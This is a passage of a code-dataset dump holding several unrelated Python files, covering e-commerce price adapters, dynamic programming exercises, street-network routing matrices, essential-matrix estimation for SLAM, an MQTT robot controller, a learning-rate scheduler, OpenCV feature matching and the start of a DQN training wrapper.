customer, dependend of the product \n is for sale or not.\n \"\"\"\n tax_abs_customer = self.taxes.getTaxForCustomer()\n return self._getEffectivePriceNet() + tax_abs_customer\n\n def _getEffectivePriceNet(self):\n \"\"\"Returns the effective price for customer, dependend of the product \n is for sale or not.\n \"\"\"\n if self.context.getForSale() == True:\n price = self.context.getSalePrice()\n else:\n price = self.context.getPrice()\n \n if self.gross_prices == True:\n return price - self.taxes.getTax()\n else:\n return price\n\n def _getEffectivePriceGross(self):\n \"\"\"Returns the effective price for customer, dependend of the product \n is for sale or not.\n \"\"\"\n if self.context.getForSale() == True:\n price = self.context.getSalePrice()\n else:\n price = self.context.getPrice()\n \n if self.gross_prices == True:\n return price\n else:\n return price + self.taxes.getTax()\n\n # Standard Price\n def _getStandardPriceForCustomer(self):\n \"\"\"Returns always the standard price, independent of the product is for \n sale or not. We need this in any case to display the standard price \n (e.g. stroked).\n \"\"\"\n tax_abs_customer = self.taxes.getTaxForCustomer(False)\n return self._getStandardPriceNet() + tax_abs_customer\n\n def _getStandardPriceNet(self):\n \"\"\"Returns always the standard price, independent of the product is for \n sale or not. We need this in any case to display the standard price \n (e.g. stroked).\n \"\"\"\n if self.gross_prices == True:\n return self.context.getPrice() - self.taxes.getTax(False)\n else:\n return self.context.getPrice()\n\n def _getStandardPriceGross(self):\n \"\"\"Returns always the standard price, independent of the product is for \n sale or not. We need this in any case to display the standard price \n (e.g. 
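The net/gross branches in these price adapters are easy to misread. With concrete (hypothetical) figures the rule is: when the shop stores gross prices, net is the stored price minus the absolute tax; otherwise gross is the stored price plus it. A worked sketch:

gross_prices = True
price = 119.0      # price as stored on the product
tax = 19.0         # absolute tax amount, as returned by ITaxes.getTax()

price_net = price - tax if gross_prices else price
price_gross = price if gross_prices else price + tax
print(price_net, price_gross)   # 100.0 119.0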
stroked).\n \"\"\"\n if self.gross_prices == True:\n return self.context.getPrice()\n else:\n return self.context.getPrice() + self.taxes.getTax(False)\n \nclass ProductVariantPrices(ProductPrices):\n \"\"\"Provides IPrices for product variant content object.\n \"\"\"\n implements(IPrices)\n adapts(IProductVariant)\n\n def __init__(self, context):\n \"\"\"\n \"\"\"\n super(ProductVariantPrices, self).__init__(context)\n self.parent = self.context.aq_inner.aq_parent\n\n def getPriceForCustomer(self, effective=True):\n \"\"\"\n \"\"\"\n if self.context.getPrice() != 0:\n base = super(ProductVariantPrices, self)\n return base.getPriceForCustomer(effective)\n else:\n return IPrices(self.parent).getPriceForCustomer(variant_price=False)\n \n def getPriceNet(self, effective=True):\n \"\"\"\n \"\"\"\n if self.context.getPrice() != 0:\n base = super(ProductVariantPrices, self)\n return base.getPriceNet(effective)\n else:\n return IPrices(self.parent).getPriceNet(variant_price=False)\n\n def getPriceGross(self, effective=True):\n \"\"\"\n \"\"\"\n if self.context.getPrice() != 0:\n base = super(ProductVariantPrices, self)\n return base.getPriceGross(effective)\n else:\n return IPrices(self.parent).getPriceGross(variant_price=False)","repo_name":"ned14/Easyshop","sub_path":"src/easyshop.catalog/easyshop/catalog/adapters/prices.py","file_name":"prices.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"61"} +{"seq_id":"2040285828","text":"\nfrom time import time\n\n# Brute force way!\n\nn = 10\n\n\ndef countPaths(row: int = 0, col: int = 0) -> int:\n\n if row >= n or col >= n:\n return 0\n\n if row == n - 1 and col == n - 1:\n return 1\n\n return countPaths(row + 1, col) + countPaths(row, col + 1)\n\n\nstart_time = time()\nres = countPaths()\ndiff1 = time() - start_time\nprint(\"# ways: \", res, \" Time taken without cache: \", diff1)\n\n\n# Memoization\n# Top Down Approach\n\ncache = {}\n\n\nn = 10\n\n\ndef countPaths2(row: int = 0, col: int = 0) -> int:\n\n if row >= n or col >= n:\n return 0\n\n if (row, col) in cache:\n return cache[(row, col)]\n\n if row == n - 1 and col == n - 1:\n return 1\n\n cache[(row, col)] = countPaths2(row + 1, col) + countPaths2(row, col + 1)\n return cache[(row, col)]\n\n\nstart_time = time()\nres = countPaths2()\ndiff2 = time() - start_time\nprint(\"# ways: \", res, \" Time taken with cache: \", diff2)\n\n\n# Bottom Up approach\n\nn = 10\nm = 10\n\n\ndef countPaths3():\n\n # init\n r1 = [0] * m\n r1[-1] = 1\n\n for _ in range(n):\n r2 = [1] * m\n for index in range(m-2, -1, -1):\n r2[index] = r1[index] + r2[index + 1]\n\n r1 = r2\n\n return r2[0]\n\n\nstart_time = time()\nres = countPaths3()\ndiff3 = time() - start_time\nprint(\"# ways: \", res, \" Time taken with cache: \", diff3)\n\nprint(min(diff1, diff2, diff3))\n","repo_name":"aryanjain28/DSA","sub_path":"2dProgramming.py","file_name":"2dProgramming.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26089733175","text":"class Solution:\n def maxResult(self, nums: List[int], k: int) -> int:\n n = len(nums)\n dp = [0] * n\n dp[n - 1] = nums[n - 1]\n heap = []\n heapq.heappush(heap, (-nums[n - 1], n - 1))\n for i in range(n - 2, -1, -1):\n while True:\n if i + k >= heap[0][1]:\n dp[i] = nums[i] + heap[0][0] * -1\n heapq.heappush(heap, (-dp[i], i))\n break\n else:\n heapq.heappop(heap)\n return dp[0]\n # dp = [0] * n\n# dp[0] = 
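All three countPaths variants above answer the same lattice-path question, which also has a closed form: reaching the opposite corner of an n-by-n grid takes n-1 right moves and n-1 down moves in some order, i.e. C(2(n-1), n-1) paths. A one-liner to cross-check the DP results:

from math import comb

n = 10
print(comb(2 * (n - 1), n - 1))   # 48620, matching countPaths()/countPaths3()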
nums[0]\n# for i in range(1, n):\n# maxScore = 0\n# for j in range(1, k + 1):\n# if i - j < 0: continue\n \n# maxScore = max(maxScore, dp[i - j])\n# dp[i] = maxScore + nums[i]\n# print(dp)","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"1696-jump-game-vi/1696-jump-game-vi.py","file_name":"1696-jump-game-vi.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29741626192","text":"import osmnx as ox\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport math\nimport json\nfrom shapely.geometry import Point,Polygon\nimport herepy\nfrom time import perf_counter\nimport copy\nfrom math import *\n\nroutingApi = herepy.RoutingApi('api key')\n\nville = 'Bordeaux, France'\ncs = '[out:json][timeout:600]'\nname = 'Bordeaux_cluster.json'\n\ncolour_code = [\n '#566D7E', '#000080', '#357EC7', '#3BB9FF', '#ADDFFF', '#7FFFD4',\n '#3EA99F', '#728C00', '#52D017', '#00FF00', '#FFFF00', '#FFD801',\n '#FFA62F', '#D4A017', '#B87333', '#966F33', '#6F4E37', '#C36241',\n '#CC6600', '#F87217', '#F9966B', '#E77471', '#FF0000', '#9F000F',\n '#7D0552', '#7F525D', '#EDC9AF', '#FAAFBE', '#F778A1', '#F52887',\n '#FF00FF', '#4B0082', '#A74AC7', '#8E35EF'\n ]\n\nville_street = ox.graph_from_place(ville, timeout = 1500, network_type = 'drive')\nnodes, edges = ox.graph_to_gdfs(ville_street)\n\nfile2 = open(\"data/json/contours-iris_Bordeaux.json\", \"r\", encoding='utf-8')\ndata = json.load(file2)\n\nfig, ax = plt.subplots()\nfig, ax2 = plt.subplots()\n\nedges.plot(ax = ax2, linewidth = 0.7, edgecolor = 'black')\n\nj = 0\ncompt = 0\nlong = 0\nid_index = 0\ndict = []\nmatrices = []\nall_points = []\n\nfor dat in data:\n if 'Bordeaux' in dat['fields']['nom_com']: # If not Bordeaux, you must add a space at the end : 'Paris '\n\n print(dat['fields']['nom_com'])\n compt += 1\n print (compt)\n if j == (np.size(colour_code) -1):\n j = 0\n j += 1\n\n if np.size(dat['fields']['geo_shape']['coordinates']) == 2:\n range_dat = 2\n else:\n range_dat = 1\n\n for i in range(0, range_dat):\n #try:\n t = 0\n if range_dat == 2:\n try:\n poly = Polygon(dat['fields']['geo_shape']['coordinates'][i][0])\n except:\n poly = Polygon(dat['fields']['geo_shape']['coordinates'][i])\n else:\n poly = Polygon(dat['fields']['geo_shape']['coordinates'][0])\n try:\n g = ox.graph_from_polygon(poly, network_type='drive', clean_periphery=True, retain_all=True, truncate_by_edge=True)\n except:\n print('')\n print('NO GRAPH IN TAHT ONE')\n print('')\n\n n, e = ox.graph_to_gdfs(g)\n\n e.plot(ax = ax, linewidth = 0.7, edgecolor = colour_code[j])\n for i in range(0, int(np.size(e) / np.size(e.iloc[0]) - 1)):\n id_index += 1\n rue = {\n 'id' : id_index,\n 'u' : int(e.iloc[i]['u']),\n 'v' : int(e.iloc[i]['v']),\n 'cluster_number' : compt\n }\n dict.append(rue)\n\n\n points = []\n sizing = int(np.size(n) / np.size(n.iloc[0]))\n for i in range(0, sizing):\n points.append([n.iloc[i]['y'], n.iloc[i]['x']])\n\n print (points)\n print(np.size(points))\n all_points.append(points)\n count = 0\n tic = perf_counter()\n matice_test = []\n for k in range(0, sizing):\n\n matrix = []\n count = ceil(sizing/100)\n for l in range(0, count):\n bool = False\n while bool == False:\n try :\n response = routingApi.matrix(\n start_waypoints = [points[k]],\n destination_waypoints = points[l*100:min(sizing, 100 + l*100)],\n departure='2020-07-01T13:38:00+02',\n modes=[herepy.RouteMode.fastest, herepy.RouteMode.car]\n )\n bool = True\n except:\n bool = 
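The accepted heap solution above runs in O(n log n) because stale indices linger in the heap until popped. The standard O(n) alternative keeps a monotonically decreasing deque of candidate indices; a sketch, checked against the usual example:

from collections import deque

def max_result(nums, k):
    dq = deque([0])                   # indices with decreasing dp values
    dp = [0] * len(nums)
    dp[0] = nums[0]
    for i in range(1, len(nums)):
        while dq[0] < i - k:          # front is too far back to jump from
            dq.popleft()
        dp[i] = nums[i] + dp[dq[0]]
        while dq and dp[dq[-1]] <= dp[i]:
            dq.pop()                  # dominated entries can never win again
        dq.append(i)
    return dp[-1]

print(max_result([1, -1, -2, 4, -7, 3], 2))   # 7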
False\n print('Nope')\n\n # Must create a temp file in order to work with the response from Here.\n f = open(\"data/json/temp.json\", \"w\")\n c = copy.copy(response)\n f.write(str(c))\n f.close()\n file = open(\"data/json/temp.json\", \"r\", encoding='utf-8')\n data = json.load(file)\n for rep in data['response']['matrixEntry']:\n matrix.append(rep['summary']['travelTime'])\n\n\n matice_test.append(matrix)\n\n matrices.append(matice_test)\n toc = perf_counter()\n t += toc - tic\n\n print(f\"it took {t} seconde to get this matrix\")\n\n #except:\n # print('')\n # print('POLYGON BUG')\n # print('')\n\n\nj = json.dumps(dict, indent=4, sort_keys=True, ensure_ascii=False)\nf = open(name, \"w\")\nf.write(j)\nf.close()\n\nf = open(\"data/json/matrices_Bordeaux.json\", \"w\")\nf.write(f\"{matrices}\")\nf.close()\n\nf = open(\"data/json/points_Bordeaux.json\", \"w\")\nf.write(f\"{all_points}\")\nf.close()\n\n\n\nprint('')\nprint(int(np.size(edges) / np.size(edges.iloc[0])))\n\nplt.show()\n","repo_name":"mgaury/NetworkBuilder","sub_path":"cluster_IRIS.py","file_name":"cluster_IRIS.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13936377865","text":"'''\nVisual Monocular SLAM Implementation\nCreated: Sept 10, 2019\nAuthor: Michael Liu (GURU AI Group, UCSD)\n'''\n\nimport numpy as np \nfrom .triangulation import LinearTriangulation\nfrom .utils import *\n\n'''\nMinimum Solver for Essential Matrix: currently using skimage.transform.EssentialMatrixTransform\nDLT for Essential Matrix: direct linear transform for essential matrix\n'''\ndef DLT_E(norm_x1, norm_x2, normalize=True):\n # Inputs:\n # x1 - homogeneous normalized correspondences in image 1\n # x2 - homogeneous normalized correspondences in image 2\n # normalize - if True, apply data normalization to x1 and x2\n #\n # Outputs:\n # E - the DLT estimate of the essential matrix \n \n # points normalization with calibration matrix\n print(\"normalized points shape: {}\".format(norm_x1.shape))\n assert norm_x1.shape[0] == 3\n x1, x2 = np.matrix(Dehomogenize(norm_x1)), np.matrix(Dehomogenize(norm_x2))\n # data normalization\n if normalize:\n x1, T1 = Normalize(x1)\n x2, T2 = Normalize(x2)\n else:\n x1 = Homogenize(x1)\n x2 = Homogenize(x2)\n A = np.zeros((0, 9))\n for i in range(x1.shape[1]):\n Ai = np.kron(x2[:, i].T, x1[:, i].T)\n A = np.vstack((A, Ai))\n f = RightNull(A)\n E = f.reshape(3, 3)\n u, d, vt = np.linalg.svd(E)\n d[2] = 0\n print('diag: {}'.format(d))\n a, b = d[0], d[1]\n d[0] = d[1] = (a+b)/2\n E = u @ np.diag(d) @ vt\n # data denormalization\n if normalize:\n E = T2.T @ E @ T1\n E_norm = E / np.linalg.norm(E)\n return E_norm\n\ndef DLT_F(x1, x2, normalize=True):\n assert x1.shape[0] == 3\n x1, x2 = np.matrix(Dehomogenize(x1)), np.matrix(Dehomogenize(x2))\n # data normalization\n if normalize:\n x1, T1 = Normalize(x1)\n x2, T2 = Normalize(x2)\n else:\n x1 = Homogenize(x1)\n x2 = Homogenize(x2)\n A = np.zeros((0, 9))\n for i in range(x1.shape[1]):\n Ai = np.kron(x2[:, i].T, x1[:, i].T)\n A = np.vstack((A, Ai))\n f = RightNull(A)\n F = f.reshape(3, 3)\n u, d, vt = np.linalg.svd(F)\n d[2] = 0\n print('diag: {}'.format(d))\n # a, b = d[0], d[1]\n # d[0] = d[1] = (a+b)/2\n F = u @ np.diag(d) @ vt\n # data denormalization\n if normalize:\n F = T2.T @ F @ T1\n F_norm = F / np.linalg.norm(F)\n return F_norm\n\n'''\nDecompose Essential Matrix into four solutions\n- inputs:\n - x1, x2 are one 2d correspondence\n - E is essential matrix 
that is ready to be decomposed\n- ouput:\n - P1=[I|0], P2\n'''\ndef Decompose_Essential(E, x1, x2, mode='matrix'):\n '''\n X is the reconstructed homogeneous 3D point\n Cheirality (Richard I. Harley) tests whether the reconstructed point is in front of the camera pose\n '''\n def cheirality(P, X):\n assert X.shape == (4, 1)\n w = P[2, :] @ X\n return w * X[-1,0] * np.linalg.det(P[:, :3]) > 0\n\n def decompose(E):\n U, d, Vt = np.linalg.svd(E)\n Z = np.matrix([[0, -1, 0],[1, 0, 0],[0, 0, 1]])\n R1, R2 = U @ Z @ Vt, U @ Z.T @ Vt\n t1, t2 = U[:, -1], -U[:, -1]\n if np.linalg.det(R1) < 0:\n R1 = -R1\n if np.linalg.det(R2) < 0:\n R2 = -R2\n return R1, R2, t1, t2\n\n def decompose_matrix(E):\n U, d, Vt = np.linalg.svd(E)\n W = np.matrix([[0, -1, 0], [1, 0, 0], [0, 0, 1]])\n Z = np.matrix([[0, 1, 0], [-1, 0, 0], [0, 0, 0]])\n T = U @ Z @ U.T\n R1 = U @ W @ Vt\n R2 = U @ W.T @ Vt\n if np.linalg.det(R1) < 0:\n R1 = -R1\n if np.linalg.det(R2) < 0:\n R2 = -R2\n t = np.zeros((3,1))\n t[0, 0] = T[2, 1]\n t[1, 0] = T[0, 2]\n t[2, 0] = T[1, 0]\n # print('R1: {}, R2: {}'.format(R1, R2))\n # print('det(R1): {}, det(R2): {}'.format(np.linalg.det(R1), np.linalg.det(R2)))\n # print('t1: {}, t2: {}'.format(t, -t))\n return R1, R2, t, -t\n\n R1, R2, t1, t2 = None, None, None, None\n if mode == 'matrix':\n R1, R2, t1, t2 = decompose_matrix(E)\n else:\n R1, R2, t1, t2 = decompose(E)\n # Canonical Camera Matrix\n P0 = np.hstack((np.eye(3), np.zeros((3,1))))\n P_prime = None\n not_essential_count = 0\n # Four Possible Solutions\n P1 = np.concatenate((R1, t1), axis=1)\n P2 = np.concatenate((R1, t2), axis=1)\n P3 = np.concatenate((R2, t1), axis=1)\n P4 = np.concatenate((R2, t2), axis=1)\n max_inliers = 0\n for P in [P1, P2, P3, P4]:\n # testing chirality of Triangulation\n inlier = 0\n for i in range(x1.shape[1]):\n X = LinearTriangulation(x1[:, i], x2[:, i], P0, P)\n if cheirality(P0, X) and cheirality(P, X):\n inlier += 1\n if max_inliers < inlier:\n max_inliers = inlier\n P_prime = P\n assert P_prime is not None\n return P0, P_prime\n\ndef Project_Essential(I, P2, Rt):\n R, t = Rt[:, :3], Rt[:, -1].reshape(-1,1)\n I, O = I[:, :3], I[:, -1].reshape(-1,1)\n R2, t2 = P2[:, :3], P2[:, -1].reshape(-1,1)\n P1 = np.hstack((R @ I, O + t))\n P3 = np.hstack((R @ R2, t2 + t))\n return P1, P3\n\ndef Compose_Essential(P1, P2):\n R1, t1 = P1[:, :3], P1[:, -1]\n R2, t2 = P2[:, :3], P2[:, -1]\n R, t = R2 @ R1.T, t2.reshape(-1,1) - t1.reshape(-1,1)\n E = Skew(t.reshape(-1, 1)) @ R\n return E","repo_name":"iosmichael/slamulance","sub_path":"geometry/essential.py","file_name":"essential.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13324069241","text":"#!/usr/bin/env python3\nimport paho.mqtt.client as mqtt # import the client\nimport pygame\nimport time\n\nFPS = 24\npygame.init()\npygame.display.set_caption(\"Control System\")\n\n# Connect to broker\nbroker_address = \"localhost\" # 192.168.0.3\nclient = mqtt.Client(\"Master\")\nclient.connect(broker_address)\n\n# client.on_connect = on_connect\n# client.on_message = on_message\n\nLength, Width, Height = 41.91, 55.88, 30 # cm\n\n# Setup pygame\nSCREEN_WIDTH = 500\nSCREEN_HEIGHT = 300\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\nclock = pygame.time.Clock()\n\nrunning = True\nd_pad_held = [False, False, False, False]\nbutton_held = [False, False]\nspeed = 25\nwhile running:\n client.loop(timeout=.1)\n # - events -\n for event in pygame.event.get():\n 
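DLT_E above averages the two largest singular values and zeroes the third; that is exactly the defining property of an essential matrix E = [t]x R, whose singular values are (s, s, 0). A quick numerical sketch of the fact:

import numpy as np

def skew(t):
    tx, ty, tz = t.ravel()
    return np.array([[0.0, -tz, ty],
                     [tz, 0.0, -tx],
                     [-ty, tx, 0.0]])

R, _ = np.linalg.qr(np.random.randn(3, 3))   # random orthogonal matrix
t = np.random.randn(3, 1)
E = skew(t) @ R
print(np.round(np.linalg.svd(E, compute_uv=False), 6))
# -> two equal singular values and a zero, e.g. [1.31 1.31 0.]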
if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n d_pad_held[0] = True\n if event.key == pygame.K_RIGHT:\n d_pad_held[1] = True\n if event.key == pygame.K_UP:\n d_pad_held[2] = True\n if event.key == pygame.K_DOWN:\n d_pad_held[3] = True\n if event.key == pygame.K_LSHIFT:\n speed = 75\n if event.key == pygame.K_a:\n button_held[0] = True\n if event.key == pygame.K_s:\n button_held[1] = True\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n d_pad_held[0] = False\n if event.key == pygame.K_RIGHT:\n d_pad_held[1] = False\n if event.key == pygame.K_UP:\n d_pad_held[2] = False\n if event.key == pygame.K_DOWN:\n d_pad_held[3] = False\n if event.key == pygame.K_LSHIFT:\n speed = 25\n if event.key == pygame.K_a:\n button_held[0] = False\n if event.key == pygame.K_s:\n button_held[1] = False\n\n if d_pad_held[0]:\n client.publish(\"A\", str(speed)[:4])\n client.publish(\"B\", str(-speed)[:4])\n elif d_pad_held[1]:\n client.publish(\"A\", str(-speed)[:4])\n client.publish(\"B\", str(speed)[:4])\n elif d_pad_held[2]:\n client.publish(\"A\", str(speed)[:4])\n client.publish(\"B\", str(speed)[:4])\n elif d_pad_held[3]: \n client.publish(\"A\", str(-speed)[:4])\n client.publish(\"B\", str(-speed)[:4])\n else:\n client.publish(\"A\", str(0)[:4])\n client.publish(\"B\", str(0)[:4])\n\n if button_held[0]:\n client.publish(\"D\", str(-speed)[:4])\n elif button_held[1]:\n client.publish(\"D\", str(speed)[:4])\n else:\n client.publish(\"D\", str(0)[:4])\n\n # - draws (without updates) -\n screen.fill((255,255,255))\n pygame.display.flip()\n\n # - constant game speed / FPS -\n clock.tick(FPS)\n\n# - end -\npygame.quit()","repo_name":"NWalker4483/MSU_RMC_2021","sub_path":"host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9596541560","text":"from typing import List\nimport math\nfrom torch.optim.lr_scheduler import _LRScheduler\n\n\nclass CustomLRScheduler(_LRScheduler):\n \"\"\"\n Creating a custom LR scheduler module\n \"\"\"\n\n def __init__(\n self,\n optimizer,\n max_lr: float = 0.1,\n cycle_length: int = 1000,\n base_lr: float = 0.001,\n last_epoch=-1,\n **kwargs\n ):\n \"\"\"\n Create a new scheduler.\n\n Args:\n optimizer (torch.optim.Optimizer): The optimizer to use.\n max_lr (float): The maximum learning rate to use.\n cycle_length (int): The length of the cycle, in iterations.\n base_lr (float): The minimum learning rate to use.\n last_epoch (int): The index of the last epoch. 
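Instead of maintaining d_pad_held by hand from KEYDOWN/KEYUP events, the control loop above could poll pygame.key.get_pressed() once per frame. A sketch of the mapping factored into a helper; it is meant to be read in the script's context (client, speed):

import pygame

def drive_command(keys, speed):
    # Arrow-key state -> (motor A, motor B) speeds; one get_pressed() poll
    # per frame replaces the four hand-maintained d_pad_held flags.
    if keys[pygame.K_LEFT]:
        return speed, -speed
    if keys[pygame.K_RIGHT]:
        return -speed, speed
    if keys[pygame.K_UP]:
        return speed, speed
    if keys[pygame.K_DOWN]:
        return -speed, -speed
    return 0, 0

# a, b = drive_command(pygame.key.get_pressed(), speed)
# client.publish("A", str(a)[:4]); client.publish("B", str(b)[:4])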
Default: -1.\n \"\"\"\n self.max_lr = max_lr\n self.cycle_length = cycle_length\n self.base_lr = base_lr\n super().__init__(optimizer, last_epoch)\n\n def get_lr(self) -> List[float]:\n \"\"\"\n Compute the new learning rate using the triangular policy.\n \"\"\"\n cycle = math.floor(1 + self.last_epoch / (2 * self.cycle_length))\n x = abs(self.last_epoch / self.cycle_length - 2 * cycle + 1)\n lr = self.base_lr + (self.max_lr - self.base_lr) * max(0, (1 - x))\n\n return [lr for _ in self.optimizer.param_groups]\n","repo_name":"bsen26/homework","sub_path":"assignments/03-RegOpt/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"22689266645","text":"#coding:utf-8\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport datetime\r\n\r\n\r\n#定义一个drawmatches函数\r\ndef drawMatches(img1, kp1, img2, kp2, matches):\r\n # Create a new output image that concatenates the two images together\r\n # (a.k.a) a montage\r\n rows1 = img1.shape[0]\r\n cols1 = img1.shape[1]\r\n rows2 = img2.shape[0]\r\n cols2 = img2.shape[1]\r\n\r\n out = np.zeros((max([rows1,rows2]),cols1+cols2,3), dtype='uint8')\r\n\r\n # Place the first image to the left\r\n out[:rows1,:cols1] = np.dstack([img1, img1, img1])\r\n\r\n # Place the next image to the right of it\r\n out[:rows2,cols1:] = np.dstack([img2, img2, img2])\r\n\r\n # For each pair of points we have between both images\r\n # draw circles, then connect a line between them\r\n for mat in matches:\r\n\r\n # Get the matching keypoints for each of the images\r\n img1_idx = mat.queryIdx\r\n img2_idx = mat.trainIdx\r\n\r\n # x - columns\r\n # y - rows\r\n (x1,y1) = kp1[img1_idx].pt\r\n (x2,y2) = kp2[img2_idx].pt\r\n\r\n # Draw a small circle at both co-ordinates\r\n # radius 4\r\n # colour blue\r\n # thickness = 1\r\n cv2.circle(out, (int(x1),int(y1)), 4, (201, 186, 131), 1) \r\n cv2.circle(out, (int(x2)+cols1,int(y2)), 4, (28, 127, 135), 1)\r\n\r\n # Draw a line in between the two points\r\n # thickness = 1\r\n # colour blue\r\n cv2.line(out, (int(x1),int(y1)), (int(x2)+cols1,int(y2)), (137, 69, 148), 1)\r\n\r\n\r\n # Show the image\r\n cv2.imshow('Matched Features', out)\r\n cv2.waitKey(0)\r\n cv2.destroyWindow('Matched Features')\r\n\r\n # Also return the image if you'd like a copy\r\n return out\r\n\r\n\r\nbeaver = cv2.imread('images/haha.PNG')\r\n#彩色图\r\n#plt.imshow(cv2.cvtColor(beaver,cv2.COLOR_BGR2RGB))\r\n#灰度图\r\ngray = cv2.cvtColor(beaver,cv2.COLOR_BGR2GRAY)\r\n#SIFT特征检测器\r\n#sift = cv2.xfeatures2d.SIFT_create()\r\nsift=cv2.SIFT()\r\n#sift = cv2.xfeatures2d.SIFT_create()\r\nkeypoints = sift.detect(beaver,None)\r\n#在图片中将特征点显示\r\nbeaver_sift = cv2.drawKeypoints(beaver,keypoints,None)\r\n#找到关键点和描述符(128*kp)\r\nkp,des = sift.compute(gray,keypoints)\r\nplt.imshow(cv2.cvtColor(beaver_sift, cv2.COLOR_BGR2RGB))\r\nplt.show()\r\n#特征点匹配\r\n#img1 = cv2.imread('images/box.png')\r\n#img2 = cv2.imread('images/box_in_scene.png')\r\n#img1 = cv2.imread('images/haha1.PNG')\r\n#img2 = cv2.imread('images/haha.PNG')\r\nimg1 = cv2.imread('images/jianjian.jpg')\r\nimg2 = cv2.imread('images/jianjian1.jpg')\r\n\"\"\"\r\nplt.subplot(1,2,1)\r\nplt.imshow(cv2.cvtColor(img1,cv2.COLOR_BGR2RGB))\r\nplt.subplot(1,2,2)\r\nplt.imshow(cv2.cvtColor(img2,cv2.COLOR_BGR2RGB))\r\n\"\"\"\r\n\"\"\"\r\ngray1 = cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY)\r\ngray2 = cv2.cvtColor(img2,cv2.COLOR_BGR2GRAY)\r\n\r\norb = cv2.ORB(1000, 1.2)\r\n\r\n(kp1,des1) = 
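The get_lr() formula above implements the triangular cyclical policy; extracting it makes the shape of the schedule easy to verify by hand:

import math

def triangular_lr(step, base_lr=0.001, max_lr=0.1, cycle_length=1000):
    # Same formula as CustomLRScheduler.get_lr(), pulled out for inspection.
    cycle = math.floor(1 + step / (2 * cycle_length))
    x = abs(step / cycle_length - 2 * cycle + 1)
    return base_lr + (max_lr - base_lr) * max(0, 1 - x)

for s in (0, 500, 1000, 1500, 2000):
    print(s, round(triangular_lr(s), 4))
# 0 -> 0.001 (base), 1000 -> 0.1 (peak), 2000 -> 0.001 again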
orb.detectAndCompute(gray1, None)\r\n\r\n(kp2,des2) = orb.detectAndCompute(gray2, None)\r\n\r\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\r\n\r\nmatches = bf.match(des1,des2)\r\n\r\nmatches = sorted(matches, key=lambda val: val.distance)\r\n\r\nout = drawMatches(gray1, kp1, gray2, kp2, matches[:30])\r\n\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\nkp1, des1 = sift.detectAndCompute(gray1, None)\r\nkp2, des2 = sift.detectAndCompute(gray2, None)\r\n\r\n\r\ndes1 = des1 / np.repeat(np.sum(des1, axis = 1).reshape(des1.shape[0], 1), des1.shape[1], axis=1)\r\ndes2 = des2 / np.repeat(np.sum(des2, axis = 1).reshape(des2.shape[0], 1), des2.shape[1], axis=1)\r\n\r\n# Calculate Hellinger distance for every feature pair\r\ndist_mat = np.sqrt(np.abs(1.0 - np.dot(np.sqrt(des1), np.sqrt(des2).transpose())))\r\n\r\n# Match with ratio test\r\nmin_arg = np.argsort(dist_mat, axis=1)\r\ngood_matches = []\r\nfor i in range(dist_mat.shape[0]):\r\n m, n = min_arg[i][0:2]\r\n if dist_mat[i][m] < dist_mat[i][n] * 0.75:\r\n dmatch = cv2.DMatch(i, m, 0, dist_mat[i][m]) # _queryIdx, _trainIdx, _imgIdx, _distance\r\n good_matches.append(dmatch)\r\n\r\n\r\nout = drawMatches(gray1, kp1, gray2, kp2, good_matches[:30])\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sun123zhengjun/deep-learning-","sub_path":"myopencv/mycv3.py","file_name":"mycv3.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70663609155","text":"import gym\nfrom stable_baselines import PPO2\nfrom stable_baselines.deepq import DQN\nfrom stable_baselines.common.vec_env.dummy_vec_env import DummyVecEnv\nfrom stable_baselines.bench import Monitor\nfrom stable_baselines.results_plotter import load_results, ts2xy\nimport numpy as np\nimport os\nfrom stable_baselines.common.vec_env import SubprocVecEnv\nfrom stable_baselines.common import set_global_seeds\nfrom gym_modifier.envs.cartpole import CartPoleEnv\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Flatten\nfrom keras.optimizers import Adam\nfrom keras_rl.agents.dqn import DQNAgent\nfrom keras_rl.policy import BoltzmannQPolicy\nfrom keras_rl.memory import SequentialMemory\nfrom keras_rl.callbacks import TrainIntervalLogger\nfrom keras_rl.callbacks import FileLogger\nfrom keras_rl.callbacks import ModelIntervalCheckpoint\n\n\n\n\ndef train_doubledqn(env_name='CartPole-v1',\n steps=10000,\n lr=5e-4,\n exploration_rate=1.0,\n log_dir='./Logs/',\n log_name = None,\n prev_model = None):\n \"\"\"\n Wrapper for training a network with DQN\n\n :param env_name: The name of the environment to load [String]\n :param steps: The number of time-steps to train for [Int]\n :param exploration_rate: The exploration rate for the algorithm [double or whatever]\n :param lr: The learning rate for the algorithm [double or whatever]\n :param log_dir: The base log folder [String]\n :param log_name: Puts the logs in a subdir of this name [String]\n \"\"\"\n\n # Generates a folder hierarchy for the logging:\n\n if log_name is None:\n log_dir = log_dir + env_name + '/' + 